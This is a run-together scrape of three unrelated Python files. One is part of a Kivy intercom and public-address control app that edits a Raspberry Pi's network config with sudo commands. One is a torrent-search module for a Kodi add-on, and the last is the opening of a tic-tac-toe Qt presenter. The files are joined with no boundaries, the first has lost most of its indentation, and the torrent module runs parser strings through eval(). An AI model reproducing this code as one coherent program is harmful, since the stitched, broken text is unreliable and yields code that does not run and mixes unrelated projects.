capa_fondo.add_widget(self.imagenfondo)
capa_fondo.add_widget(capa_info)
capa_fondo.add_widget(capa_botones)
self.add_widget(capa_fondo)
boton_cctv.bind(on_release=self.cambiocctv)
boton_megafonia.bind(on_release=self.cambiomegafonia)
boton_videoip.bind(on_release=self.cambiovideoportero)
boton_settings.bind(on_press=self.configuracion)
def configuracion (self,*args):
config = ConfigParser()
config.read('ollosip.ini')
self.configuracion =SettingsWithSidebar()# Settings()
self.configuracion.add_json_panel('Configuracion Ollosip', config, 'settings_ollosip.json')
self.add_widget(self.configuracion)
self.configuracion.bind(on_close=self.cerrarconfig)
self.configuracion.bind(on_config_change=self.configcambio)
# debemos introcucir como parametro none al ser llamado desde el evento on_cofig_change
def configcambio(self,config,none,section,key,value):
global MIEXTENSION
global MIEXTENSIONP
global IPCENTRALITA
# si fuese redefinido y utilizado dentro del metodo App sobraria
#print("Config: %s / %s -> %s" % (section, key, value))
if (section == "sistema"):
if key=='ip':
self.cambia_ip_sistema(value)
if (section == "sistema"):
if key=='pe':
self.cambia_gateway_sistema(value)
if (section == "terminal"):
if key=='extension':
MIEXTENSION=value
telefono1.configure_sip_account(str(MIEXTENSION), str(MIEXTENSIONP))
#print(value)
if key=='clave':
MIEXTENSIONP=str(value)
#telefono1.start()
if key=='ipbx':
IPCENTRALITA=str(value)
telefono1.configure_sip_account(username=str(MIEXTENSION), password=str(MIEXTENSIONP))
#print(value)
def cambia_ip_sistema(self,value,*args):
#Este metodo nos permite cambiar la ip del sistema editando el fichero de la rpi dhcpcd.conf
#recibe como parametro la ip modificada desde la pantalla de configuracion
indice=0
texto="inform"
nuevotexto="inform "+str(value)+"\n"
#print (value)
x=fileinput.input(files="/etc/dhcpcd.conf", inplace=1)
for line in x:
if texto in line:
line=nuevotexto
print line,
x.close
os.system("sudo ifconfig wlan0 down")
os.system("sudo ifconfig wlan0 up")
os.system("sudo ifconfig eth0 down")
os.system("sudo ifconfig eth0 up")
def cambia_gateway_sistema(self,value,*args):
#Este metodo nos permite cambiar la ip del sistema editando el fichero de la rpi dhcpcd.conf
#recibe como parametro la ip modificada desde la pantalla de configuracion
indice=0
texto="static routers="
#print (value)
nuevotexto="static routers="+str(value)+"\n"
x=fileinput.input(files="/etc/dhcpcd.conf", inplace=1)
for line in x:
if texto in line:
line=nuevotexto
print line,
x.close
os.system("sudo ifconfig wlan0 down")
os.system("sudo ifconfig wlan0 up")
def cerrarconfig(self,*args):
self.remove_widget(self.configuracion)
def cambiovideoportero(self,*args):
self.manager.current = 'VIDEOIP' #se va a la screen con nombre MUSICA
SCREEN_ACTIVA= 'VIDEOIP'
def cambiomegafonia(self,*args):
self.manager.current = 'MEGAFONIA' #se va a la screen con nombre MUSICA
SCREEN_ACTIVA= 'MEGAFONIA'
def cambiocctv(self,*args):
self.manager.current = 'CCTV' #se va a la screen con nombre VIDEOTELEFONO
SCREEN_ACTIVA= 'CCTV'
class Rectangulo(Widget):
    """Widget that draws a rectangular outline matching its own bounds
    (see the kv rule loaded right below)."""
    # Outline line width, in pixels.
    ancho=NumericProperty(1)
    # RGBA colour of the outline.
    color=ListProperty([1,1,1,1])
Builder.load_string("""
<Rectangulo>:
canvas:
Color:
rgba:root.color
Line:
width:root.ancho
#rectangle: (self.x-10,self.y-10,self.width+10,self.height+40)
rectangle: (self.x,self.y,self.width,self.height)
""")
class Megafonia_screen(Screen):
    """Public-address (megafonia) screen: select a speaker zone and drive
    the microphone through the global SIP phone instance ``telefono1``."""
    # True while the microphone-volume slider is hidden.
    ocultar_volumen=BooleanProperty(True)
    # True while the "speakers active" label blink animation is running.
    animando=BooleanProperty(False)
    def __init__(self, **kwargs):
        # super() inherits every Screen attribute.
        super( Megafonia_screen, self).__init__(**kwargs)
        # NOTE(review): this stores the BooleanProperty *object* on the
        # instance instead of declaring a class-level Kivy property, so
        # ``self.interr`` is not False and never dispatches events —
        # confirm whether it is actually read anywhere before relying on it.
        self.interr=BooleanProperty(False)
        #self.ipcamara1="192.168.0.17"
    def actualiza_volumen_microfono(self,valor):
        # Forward the slider value to the SIP core's microphone gain (dB).
        telefono1.core.mic_gain_db=valor
    def activa_microfono(self,*args):
        """Start or stop a PA call to the zone whose toggle button is down."""
        EXTENSION=0
        # E5 = general call to every speaker zone; E1..E4 = single zones.
        if self.ids.E5.state=="down":
            EXTENSION=6060
        elif self.ids.E4.state=="down":
            EXTENSION=6064
        elif self.ids.E3.state=="down":
            EXTENSION=6063
        elif self.ids.E2.state=="down":
            EXTENSION=6031
        elif self.ids.E1.state=="down":
            EXTENSION=6030
        #logging.info('%s', EXTENSION)
        # Mic toggle pressed -> place the call; released -> hang up.
        if self.ids.microfono.state=="down":
            telefono1.llamar(EXTENSION)
        else:
            telefono1.colgar()
    # ScreenManager lifecycle hook: called every time we LEAVE this screen.
    def on_leave(self):
        # Make sure the microphone is switched off when leaving the screen.
        self.ids.microfono.state="normal"
        self.ids.microfono.parpadeo=False
        self.animando=True
        self.animate(self.ids.altofalantes)
        self.ids.microfono.flash(self.ids.activado)
        telefono1.colgar()
    def anima_volumen(self, instance):
        # Fade the volume widget in or out; the Animation object can be
        # reused on any widget. ``+=`` chains sequentially, ``&=`` in parallel.
        if self.ocultar_volumen:
            animation = Animation(opacity=1,duration=0.9,t='out_quad')
            self.ocultar_volumen=False
        else:
            animation = Animation(opacity=0,duration=0.6, t='out_quad')
            self.ocultar_volumen=True
        animation.start(instance)
    # Blink animation helper, reusable on any widget; ``self.animando``
    # toggles between starting the repeating blink and cancelling it.
    def animate(self, instance):
        animation = Animation(opacity=1,duration=0.2,t='out_quad')
        animation+= Animation(opacity=0,duration=0.2, t='out_quad')
        #animation.repeat=True
        if self.animando==False:
            animation.repeat=True
            animation.start(instance)
            self.animando=True
        else:
            self.animando=False
            instance.opacity=0
            animation.cancel_all(instance)
Builder.load_string("""
<ImageButton@ButtonBehavior+Image>
allow_stretch: False
#pos_hint: {'center_x': 0.1, 'center_y': 0.5}
#size: self.texture_size
<BotonLed2@ToggleButton+Image>:
#pos_hint: {'center_x': 0.4, 'center_y': 0.5}
font_size:self.width*0.1
text_size:self.size
valihaling:'left'
text:self.text
#size: self.texture_size
<Megafonia_screen>:
on_leave:self.ids.microfono.flash(root.ids.activado)
canvas.before:
Rectangle:
pos: self.pos
size: self.size
source:'./imaxes/fondo32.png'
BoxLayout:
id:camaras
size_hint:1,1
orientation: 'vertical'
BoxLayout:
size_hint:1,0.1
orientation: 'vertical'
canvas.before:
Color:
rgba:0.1,0.1,0.1,0.8
Rectangle:
pos: self.pos
size: self.size
BoxLayout:
id:botones
orientation:'horizontal'
#fijamos el tamano de la box en x e y, es el espacio que dejamos para los botones
size_hint:0.28,1
pos_hint:{'right': 1.03}
DigitalClock:
font_size:self.width*0.25
style:'cool'
valign:'middle'
ImageButton:
size_hint_y:0.6
opacity:0.6
source:'./imaxes/casa_white.png'
on_press: root.manager.current='OLLOSIP'
ImageButton:
opacity:0.6
source:'./imaxes/menu_white.png'
#on_press: root.animate(root.ids.menu)
BoxLayout:
orientation:'horizontal'
size_hint:1,1
FloatLayout:
#pos_hint:{'center_x': 0.8,'center_y':0.5}
orientation:'vertical'
size_hint:0.1,0.8
Label:
id:altofalantes
opacity:0
markup:True
pos_hint:{'x': 1.6,'center_y':1.2}
font_size:self.width*0.4
text:'Altofalantes activados'
VolumenRect:
id:volumen
size_hint:0.4,0.9
pos_hint:{'center_x': 0.5,'center_y':0.65}
imagen:'./imaxes/mic_white.png'
opacity:0
color: (1, 1, 1, 0.9)
maximo: 15
on_valor:root.actualiza_volumen_microfono(self.valor)
BoxLayout:
size_hint:1,0.2
pos_hint:{'center_y':0.1,'center_x':0.5}
ImageButton:
pos:root.pos
size_hint:0.15,0.35
source:'./imaxes/mic_white.png'
on_press:root.anima_volumen(root.ids.volumen)
AnchorLayout:
orientation:'vertical'
size_hint:0.6,0.6
pos_hint:{'center_x': 0.5,'center_y':0.5}
BotonColour:
id:microfono
size_hint:0.6,0.6
pos_hint:self.pos_hint
opacity:1
source:'./imaxes/mic1.png'
on_press: root.activa_microfono(),self.flash(root.ids.activado),root.animate(root.ids.altofalantes)
Rectangulo:
id:activado
ancho:3
color:1,1,1,1
size_hint:0.6,0.7
pos_hint:self.pos_hint
BoxLayout:
orientation:'vertical'
size_hint:0.2,1
pos_hint:self.pos_hint
BotonLed2:
id:E5
source:'./imaxes/megafonoverde24.png'
text:'TODAS AS ZONAS'
opacity:0.4
group:'zona'
BoxLayout:
orientation:'vertical'
size_hint:0.3,1
pos_hint:self.pos_hint
BotonLed2:
id:E1
source:'./imaxes/megafonoverde24.png'
text:'ZONA1'
opacity:0.3
#group:'zona'
#on_press:root.activa_microfono()
BotonLed2:
id:E2
#size_hint_y:0.2
source:'./imaxes/megafonoverde24.png'
text:'ZONA2'
opacity:0.3
#group:'zona'
BotonLed2:
id:E3
#size_hint_y:0.2
source:'./imaxes/megafonoverde24.png'
text:'ZONA3'
opacity:0.3
#group:'zona'
BotonLed2:
id:E4
#size_hint_y:0.2
source:'./imaxes/megafonoverde24.png'
text:'ZONA4'
opacity:0.3
#group:'zona'
""")
telefono1 = Phone(username=str(MIEXTENSION), password=str(MIEXTENSIONP), camera='', snd_capture='')
# =================
# Aplicacion principal App
# =================
class OllosipApp(App):
    """Main Kivy application: builds the screen tree and routes incoming
    SIP calls to the video-intercom screen."""
    def build(self):
        self.sm = ScreenManager()
        self.sm.transition = FadeTransition()  # RiseInTransition() also possible
        pantallas = (
            Principal_screen(name='OLLOSIP'),
            Cctv_screen(name='CCTV'),
            Videoportero_screen(name='VIDEOIP'),
            Megafonia_screen(name='MEGAFONIA'),
            Camara_screen(name='VIDEOCAMARA'),
        )
        for pantalla in pantallas:
            self.sm.add_widget(pantalla)
        self.sm.current = "OLLOSIP"
        # Custom event declared on the Phone class; fired on incoming call.
        telefono1.bind(on_llamada_entrante=self.llamada_entrando)
        return self.sm
    def llamada_entrando(self, *args):
        # Only auto-switch for calls coming from the door-station extension.
        if llamada_extension == EXT_VIDEOPORTERO:
            self.sm.current = "VIDEOIP"
if __name__ == '__main__':
    # Script entry point: start the Kivy application loop.
    OllosipApp().run()
# -*- coding: utf-8 -*-
"""
Burst processing thread
"""
import re
import json
import time
import xbmc
import xbmcaddon
import xbmcgui
from Queue import Queue
from threading import Thread
from urlparse import urlparse
from urllib import unquote
from elementum.provider import append_headers, get_setting, log
from parser.ehp import Html
from provider import process
from providers.definitions import definitions, longest
from filtering import apply_filters, Filtering
from client import USER_AGENT, Client
from utils import ADDON_ICON, notify, translation, sizeof, get_icon_path, get_enabled_providers, get_alias
# Shared mutable state used by search(), got_results() and the provider
# threads (mutated under the module-level globals, no lock — the worker
# callbacks only append/decrement).
provider_names = []        # names of providers that have not returned yet
provider_results = []      # accumulated results from every provider
available_providers = 0    # count of providers still running
request_time = time.time()
auto_timeout = get_setting("auto_timeout", bool)
timeout = get_setting("timeout", int)
# Characters that trigger quote-stripping of the search query in search().
special_chars = "()\"':.[]<>/\\?"
if auto_timeout:
    # Prefer Elementum's own provider-timeout settings when available.
    elementum_addon = xbmcaddon.Addon(id='plugin.video.elementum')
    if elementum_addon:
        if elementum_addon.getSetting('custom_provider_timeout_enabled') == "true":
            timeout = int(elementum_addon.getSetting('custom_provider_timeout'))
        else:
            timeout = 28
        log.debug("Using timeout from Elementum: %d seconds" % (timeout))
def search(payload, method="general"):
    """ Main search entrypoint

    Normalizes the payload, resets the module-level result/provider
    globals, fans out one thread per enabled provider, waits (with a
    progress dialog) until all return or ``timeout`` expires, then
    filters and returns the accumulated results.

    Args:
        payload (dict): Search payload from Elementum.
        method   (str): Type of search, can be ``general``, ``movie``, ``show``, ``season`` or ``anime``

    Returns:
        list: All filtered results in the format Elementum expects
    """
    log.debug("Searching with payload (%s): %s" % (method, repr(payload)))
    if method == 'general':
        # A general search may arrive as a dict with 'query' or as a bare
        # string; normalize both into the title/titles shape.
        if 'query' in payload:
            payload['title'] = payload['query']
            payload['titles'] = {
                'source': payload['query']
            }
        else:
            payload = {
                'title': payload,
                'titles': {
                    'source': payload
                },
            }
    # Lower-case the language keys of the available title translations.
    payload['titles'] = dict((k.lower(), v) for k, v in payload['titles'].iteritems())
    # If titles[] exists in payload and there are special chars in titles[source]
    # then we set a flag to possibly modify the search query
    payload['has_special'] = 'titles' in payload and \
                             bool(payload['titles']) and \
                             'source' in payload['titles'] and \
                             any(c in payload['titles']['source'] for c in special_chars)
    if payload['has_special']:
        log.debug("Query title contains special chars, so removing any quotes in the search query")
    if 'proxy_url' not in payload:
        payload['proxy_url'] = ''
    # Reset the shared per-request state before fanning out.
    global request_time
    global provider_names
    global provider_results
    global available_providers
    provider_names = []
    provider_results = []
    available_providers = 0
    request_time = time.time()
    providers = get_enabled_providers(method)
    if len(providers) == 0:
        notify(translation(32060), image=get_icon_path())
        log.error("No providers enabled")
        return []
    log.info("Burstin' with %s" % ", ".join([definitions[provider]['name'] for provider in providers]))
    # if get_setting("use_cloudhole", bool):
    #     clearance, user_agent = get_cloudhole_clearance(get_cloudhole_key())
    #     set_setting('clearance', clearance)
    #     set_setting('user_agent', user_agent)
    if get_setting('kodi_language', bool):
        # Warn early when the Kodi UI language has no title translation.
        kodi_language = xbmc.getLanguage(xbmc.ISO_639_1)
        if not kodi_language:
            log.warning("Kodi returned empty language code...")
        elif 'titles' not in payload or not payload['titles']:
            log.info("No translations available...")
        elif payload['titles'] and kodi_language not in payload['titles']:
            log.info("No '%s' translation available..." % kodi_language)
    p_dialog = xbmcgui.DialogProgressBG()
    p_dialog.create('Elementum [COLOR FFFF6B00]Burst[/COLOR]', translation(32061))
    # One worker thread per provider; each decrements available_providers
    # through got_results() when done.
    for provider in providers:
        available_providers += 1
        provider_names.append(definitions[provider]['name'])
        task = Thread(target=run_provider, args=(provider, payload, method))
        task.start()
    providers_time = time.time()
    total = float(available_providers)
    # Exit if all providers have returned results or timeout reached, check every 100ms
    while time.time() - providers_time < timeout and available_providers > 0:
        timer = time.time() - providers_time
        log.debug("Timer: %ds / %ds" % (timer, timeout))
        if timer > timeout:
            break
        message = translation(32062) % available_providers if available_providers > 1 else translation(32063)
        p_dialog.update(int((total - available_providers) / total * 100), message=message)
        time.sleep(0.25)
    p_dialog.close()
    del p_dialog
    # Anything left in provider_names timed out; tell the user which ones.
    if available_providers > 0:
        message = u', '.join(provider_names)
        message = message + translation(32064)
        log.warning(message.encode('utf-8'))
        notify(message, ADDON_ICON)
    log.debug("all provider_results: %s" % repr(provider_results))
    filtered_results = apply_filters(provider_results)
    log.debug("all filtered_results: %s" % repr(filtered_results))
    log.info("Providers returned %d results in %s seconds" % (len(filtered_results), round(time.time() - request_time, 2)))
    return filtered_results
def got_results(provider, results):
    """ Results callback once a provider found all its results, or not

    Sorts the provider's results by the configured criterion, truncates to
    ``max_results`` and appends them to the shared ``provider_results``.

    Fix vs. the original: ``if not sort_by`` swallowed ``sort_by == 0``,
    so the "Resolution" option (value 0) was unreachable and an unexpected
    value left ``sorted_results`` unbound (NameError). Explicit values are
    now checked first; anything else falls back to the balanced sort.

    Args:
        provider (str): The provider ID
        results (list): The list of results
    """
    global provider_names
    global provider_results
    global available_providers
    definition = definitions[provider]
    definition = get_alias(definition, get_setting("%s_alias" % provider))
    max_results = get_setting('max_results', int)
    sort_by = get_setting('sort_by', int)
    # 0 "Resolution" / 1 "Seeds" / 2 "Size" / 3 "Balanced" (default)
    if sort_by == 0:
        sorted_results = sorted(results, key=lambda r: r['sort_resolution'], reverse=True)
    elif sort_by == 1:
        sorted_results = sorted(results, key=lambda r: r['seeds'], reverse=True)
    elif sort_by == 2:
        sorted_results = sorted(results, key=lambda r: r['size'], reverse=True)
    else:
        # 3 "Balanced", plus any missing/unexpected setting value.
        # TODO: think of something interesting to balance sort results
        sorted_results = sorted(results, key=lambda r: r['sort_balance'], reverse=True)
    if len(sorted_results) > max_results:
        sorted_results = sorted_results[:max_results]
    log.info(">> %s returned %2d results in %.1f seconds%s" % (
        definition['name'].rjust(longest), len(results), round(time.time() - request_time, 2),
        (", sending %d best ones" % max_results) if len(results) > max_results else ""))
    provider_results.extend(sorted_results)
    # Mark this provider as done for the search() wait loop.
    available_providers -= 1
    if definition['name'] in provider_names:
        provider_names.remove(definition['name'])
def extract_torrents(provider, client):
    """ Main torrent extraction generator for non-API based providers

    Evaluates the provider definition's parser expressions against the
    fetched HTML and yields one tuple per result; results that need a
    sub-page fetch are resolved in worker threads and yielded at the end.

    NOTE: the parser expressions are run through eval() — the provider
    definitions must be trusted input.

    Args:
        provider (str): Provider ID
        client (Client): Client class instance

    Yields:
        tuple: A torrent result (name, info_hash, torrent, size, seeds, peers)
    """
    definition = definitions[provider]
    definition = get_alias(definition, get_setting("%s_alias" % provider))
    log.debug("Extracting torrents from %s using definitions: %s" % (provider, repr(definition)))
    if not client.content:
        # Python 2 generator idiom to end iteration (outlawed by PEP 479 in py3).
        raise StopIteration
    dom = Html().feed(client.content)
    # Parser expressions from the provider definition, eval()'d below.
    key_search = get_search_query(definition, "key")
    row_search = get_search_query(definition, "row")
    name_search = get_search_query(definition, "name")
    torrent_search = get_search_query(definition, "torrent")
    info_hash_search = get_search_query(definition, "infohash")
    size_search = get_search_query(definition, "size")
    seeds_search = get_search_query(definition, "seeds")
    peers_search = get_search_query(definition, "peers")
    referer_search = get_search_query(definition, "referer")
    log.debug("[%s] Parser: %s" % (provider, repr(definition['parser'])))
    q = Queue()
    threads = []
    needs_subpage = 'subpage' in definition and definition['subpage']
    if needs_subpage:
        # Worker run in a thread per result: fetch the detail page and
        # resolve the real torrent/magnet link, then report through q.
        def extract_subpage(q, name, torrent, size, seeds, peers, info_hash, referer):
            try:
                log.debug("[%s] Getting subpage at %s" % (provider, repr(torrent)))
            except Exception as e:
                import traceback
                log.error("[%s] Subpage logging failed with: %s" % (provider, repr(e)))
                map(log.debug, traceback.format_exc().split("\n"))
            # New client instance, otherwise it's race conditions all over the place
            subclient = Client()
            subclient.passkey = client.passkey
            headers = {}
            if get_setting("use_cloudhole", bool):
                subclient.clearance = get_setting('clearance')
                subclient.user_agent = get_setting('user_agent')
            if "subpage_mode" in definition:
                if definition["subpage_mode"] == "xhr":
                    headers['X-Requested-With'] = 'XMLHttpRequest'
                    headers['Content-Language'] = ''
            if referer:
                headers['Referer'] = referer
            uri = torrent.split('|')  # Split cookies for private trackers
            subclient.open(uri[0].encode('utf-8'), headers=headers)
            if 'bittorrent' in subclient.headers.get('content-type', ''):
                # The "subpage" itself is already the torrent file.
                log.debug('[%s] bittorrent content-type for %s' % (provider, repr(torrent)))
                if len(uri) > 1:  # Stick back cookies if needed
                    torrent = '%s|%s' % (torrent, uri[1])
            else:
                try:
                    torrent = extract_from_page(provider, subclient.content)
                    if torrent and not torrent.startswith('magnet') and len(uri) > 1:  # Stick back cookies if needed
                        torrent = '%s|%s' % (torrent, uri[1])
                except Exception as e:
                    import traceback
                    log.error("[%s] Subpage extraction for %s failed with: %s" % (provider, repr(uri[0]), repr(e)))
                    map(log.debug, traceback.format_exc().split("\n"))
            ret = (name, info_hash, torrent, size, seeds, peers)
            q.put_nowait(ret)
    if not dom:
        raise StopIteration
    if get_setting("use_debug_parser", bool):
        log.debug("[%s] Parser debug | Page content: %s" % (provider, client.content.replace('\r', '').replace('\n', '')))
    # 'key' narrows the DOM before the row query runs.
    key = eval(key_search) if key_search else ""
    if key_search and get_setting("use_debug_parser", bool):
        key_str = key.__str__()
        log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'key', key_search, key_str.replace('\r', '').replace('\n', '')))
    items = eval(row_search)
    if get_setting("use_debug_parser", bool):
        log.debug("[%s] Parser debug | Matched %d items for '%s' query '%s'" % (provider, len(items), 'row', row_search))
    for item in items:
        if get_setting("use_debug_parser", bool):
            item_str = item.__str__()
            log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'row', row_search, item_str.replace('\r', '').replace('\n', '')))
        if not item:
            continue
        # Per-row field extraction; each expression sees ``item`` in scope.
        name = eval(name_search) if name_search else ""
        torrent = eval(torrent_search) if torrent_search else ""
        size = eval(size_search) if size_search else ""
        seeds = eval(seeds_search) if seeds_search else ""
        peers = eval(peers_search) if peers_search else ""
        info_hash = eval(info_hash_search) if info_hash_search else ""
        referer = eval(referer_search) if referer_search else ""
        if 'magnet:?' in torrent:
            # Trim anything preceding the magnet URI.
            torrent = torrent[torrent.find('magnet:?'):]
        if get_setting("use_debug_parser", bool):
            log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'name', name_search, name))
            log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'torrent', torrent_search, torrent))
            log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'size', size_search, size))
            log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'seeds', seeds_search, seeds))
            log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'peers', peers_search, peers))
            if info_hash_search:
                log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'info_hash', info_hash_search, info_hash))
            if referer_search:
                log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'info_hash', referer_search, referer))
        # Pass client cookies with torrent if private
        if (definition['private'] or get_setting("use_cloudhole", bool)) and not torrent.startswith('magnet'):
            user_agent = USER_AGENT
            if get_setting("use_cloudhole", bool):
                user_agent = get_setting("user_agent")
            if client.passkey:
                torrent = torrent.replace('PASSKEY', client.passkey)
            elif client.token:
                headers = {'Authorization': client.token, 'User-Agent': user_agent}
                log.debug("[%s] Appending headers: %s" % (provider, repr(headers)))
                torrent = append_headers(torrent, headers)
                log.debug("[%s] Torrent with headers: %s" % (provider, repr(torrent)))
            else:
                # Neither passkey nor token: forward the matching cookies.
                log.debug("[%s] Cookies: %s" % (provider, repr(client.cookies())))
                parsed_url = urlparse(definition['root_url'])
                cookie_domain = '{uri.netloc}'.format(uri=parsed_url).replace('www.', '')
                cookies = []
                for cookie in client._cookies:
                    if cookie_domain in cookie.domain:
                        cookies.append(cookie)
                if cookies:
                    headers = {'Cookie': ";".join(["%s=%s" % (c.name, c.value) for c in cookies]), 'User-Agent': user_agent}
                    if client.request_headers:
                        headers.update(client.request_headers)
                    if client.url:
                        headers['Referer'] = client.url
                        headers['Origin'] = client.url
                    torrent = append_headers(torrent, headers)
        if name and torrent and needs_subpage and not torrent.startswith('magnet'):
            if not torrent.startswith('http'):
                torrent = definition['root_url'] + torrent.encode('utf-8')
            # Defer to a subpage worker; result comes back through q.
            t = Thread(target=extract_subpage, args=(q, name, torrent, size, seeds, peers, info_hash, referer))
            threads.append(t)
        else:
            yield (name, info_hash, torrent, size, seeds, peers)
    if needs_subpage:
        log.debug("[%s] Starting subpage threads..." % provider)
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        log.debug("[%s] Threads returned: %s" % (provider, repr(threads)))
        # Drain the queue: one entry per completed subpage worker.
        for i in range(q.qsize()):
            ret = q.get_nowait()
            log.debug("[%s] Queue %d got: %s" % (provider, i, repr(ret)))
            yield ret
def extract_from_api(provider, client):
    """ Main API parsing generator for API-based providers

    An almost clever API parser, mostly just for YTS, RARBG and T411

    Args:
        provider (str): Provider ID
        client (Client): Client class instance

    Yields:
        tuple: A torrent result (name, info_hash, torrent, size, seeds, peers)
    """
    try:
        data = json.loads(client.content)
    except:
        # Unparseable/empty body: fall through with no results.
        data = []
    log.debug("[%s] JSON response from API: %s" % (unquote(provider), repr(data)))
    definition = definitions[provider]
    definition = get_alias(definition, get_setting("%s_alias" % provider))
    api_format = definition['api_format']
    results = []
    # Walk the dotted path (e.g. "data.movies") down to the result list.
    result_keys = api_format['results'].split('.')
    log.debug("%s result_keys: %s" % (provider, repr(result_keys)))
    for key in result_keys:
        if key in data:
            data = data[key]
        else:
            data = []
    # log.debug("%s nested results: %s" % (provider, repr(data)))
    results = data
    log.debug("%s results: %s" % (provider, repr(results)))
    if 'subresults' in api_format:
        from copy import deepcopy
        for result in results:  # A little too specific to YTS but who cares...
            result['name'] = result[api_format['name']]
        # Flatten nested per-quality entries, merging parent fields in.
        subresults = []
        subresults_keys = api_format['subresults'].split('.')
        for key in subresults_keys:
            for result in results:
                if key in result:
                    for subresult in result[key]:
                        sub = deepcopy(result)
                        sub.update(subresult)
                        subresults.append(sub)
        results = subresults
        log.debug("%s with subresults: %s" % (provider, repr(results)))
    for result in results:
        if not result or not isinstance(result, dict):
            continue
        name = ''
        info_hash = ''
        torrent = ''
        size = ''
        seeds = ''
        peers = ''
        if 'name' in api_format:
            name = result[api_format['name']]
        if 'torrent' in api_format:
            torrent = result[api_format['torrent']]
            if 'download_path' in definition:
                torrent = definition['base_url'] + definition['download_path'] + torrent
            if client.token:
                # Private API: attach auth headers to the download URL.
                user_agent = USER_AGENT
                if get_setting("use_cloudhole", bool):
                    user_agent = get_setting("user_agent")
                headers = {'Authorization': client.token, 'User-Agent': user_agent}
                log.debug("[%s] Appending headers: %s" % (provider, repr(headers)))
                torrent = append_headers(torrent, headers)
                log.debug("[%s] Torrent with headers: %s" % (provider, repr(torrent)))
        if 'info_hash' in api_format:
            info_hash = result[api_format['info_hash']]
        if 'quality' in api_format:  # Again quite specific to YTS...
            name = "%s - %s" % (name, result[api_format['quality']])
        if 'size' in api_format:
            size = result[api_format['size']]
            # Python 2: ``long`` and ``unicode`` are builtins here.
            if type(size) in (long, int):
                size = sizeof(size)
            elif type(size) in (str, unicode) and size.isdigit():
                size = sizeof(int(size))
        if 'seeds' in api_format:
            seeds = result[api_format['seeds']]
            if type(seeds) in (str, unicode) and seeds.isdigit():
                seeds = int(seeds)
        if 'peers' in api_format:
            peers = result[api_format['peers']]
            if type(peers) in (str, unicode) and peers.isdigit():
                peers = int(peers)
        yield (name, info_hash, torrent, size, seeds, peers)
def extract_from_page(provider, content):
    """ Sub-page extraction method

    Tries a sequence of increasingly generic patterns against the sub-page
    HTML and returns the first match.

    Args:
        provider (str): Provider ID
        content  (str): Page content from Client instance

    Returns:
        str: Torrent or magnet link extracted from sub-page, or ``None``
             when nothing usable was found.
    """
    definition = definitions[provider]
    definition = get_alias(definition, get_setting("%s_alias" % provider))

    try:
        # Magnet links take priority over everything else.
        matches = re.findall(r'magnet:\?[^\'"\s<>\[\]]+', content)
        if matches:
            result = matches[0]
            log.debug('[%s] Matched magnet link: %s' % (provider, repr(result)))
            return result

        # Plain .torrent links; torcache.net is dead, swap in the itorrents mirror.
        matches = re.findall(r'http(.*?).torrent["\']', content)
        if matches:
            result = 'http' + matches[0] + '.torrent'
            result = result.replace('torcache.net', 'itorrents.org')
            log.debug('[%s] Matched torrent link: %s' % (provider, repr(result)))
            return result

        # Token-protected download links (relative to the provider root).
        matches = re.findall(r'/download\?token=[A-Za-z0-9%]+', content)
        if matches:
            result = definition['root_url'] + matches[0]
            log.debug('[%s] Matched download link with token: %s' % (provider, repr(result)))
            return result

        matches = re.findall(r'/torrents/download/\?id=[a-z0-9-_.]+', content)  # t411
        if matches:
            result = definition['root_url'] + matches[0]
            log.debug('[%s] Matched download link with an ID: %s' % (provider, repr(result)))
            return result

        # Last resort: a bare 40-hex info-hash, rebuilt into a magnet URI.
        matches = re.findall(r'\: ([A-Fa-f0-9]{40})', content)
        if matches:
            result = "magnet:?xt=urn:btih:" + matches[0]
            log.debug('[%s] Matched magnet info_hash search: %s' % (provider, repr(result)))
            return result
    except Exception:
        # Was a bare `except:`; keep the best-effort behavior but stop
        # swallowing SystemExit/KeyboardInterrupt. Regexes are now raw
        # strings to avoid invalid-escape-sequence warnings.
        pass

    return None
def run_provider(provider, payload, method):
    """ Provider thread entrypoint

    Args:
        provider (str): Provider ID
        payload (dict): Search payload from Elementum
        method   (str): Type of search; ``general``, ``movie``, ``show``,
                        ``season`` or ``anime``
    """
    log.debug("Processing %s with %s method" % (provider, method))

    filterInstance = Filtering()
    # Pick the filter-setup routine for this search type; anything
    # unrecognized falls back to the general search.
    setup_by_method = {
        'movie': filterInstance.use_movie,
        'season': filterInstance.use_season,
        'episode': filterInstance.use_episode,
        'anime': filterInstance.use_anime,
    }
    setup_by_method.get(method, filterInstance.use_general)(provider, payload)

    # API providers are parsed differently from scraped HTML pages.
    generator = extract_from_api if 'is_api' in definitions[provider] else extract_torrents
    results = process(provider=provider, generator=generator,
                      filtering=filterInstance, has_special=payload['has_special'])

    got_results(provider, results)
def get_search_query(definition, key):
    """ Looks up the parser expression for ``key`` in a provider definition.

    Args:
        definition (dict): Provider definition, optionally holding a ``parser`` dict
        key         (str): Parser entry to fetch (e.g. ``key``, ``table``, ``row``)

    Returns:
        str: The parser expression, prefixed with ``dom.`` for the structural
             keys that are evaluated against the parsed DOM, or an empty
             string when the entry is missing.
    """
    # .get() also tolerates a present-but-None 'parser' entry, which the
    # previous chained membership test would have crashed on.
    parser = definition.get('parser')
    if not parser or key not in parser:
        return ""
    # Structural selectors are resolved against the `dom` object at eval time.
    if key in ('key', 'table', 'row'):
        return "dom." + parser[key]
    return parser[key]
|
presenter.py | from PyQt5 import QtWidgets, QtGui
from game import Machine
from player import Player, HumanPlayer
import sys
import threading
import const
import view
class Presenter:
    """Mediator between the Qt ``View`` and the tic-tac-toe game ``Machine``.

    Owns both players and the engine, and runs every match on a background
    ``StoppableThread`` so the Qt event loop stays responsive.  Symbol
    convention (from update_score): 1 = nought/circle, -1 = cross.
    """

    def __init__(self, _view: view.View):
        self.view = _view
        self.games = 0                         # total finished matches, shown in the UI
        self.isTraining = False                # True while self-play training runs
        self.player2 = HumanPlayer("p2", -1)   # the human, cross by default
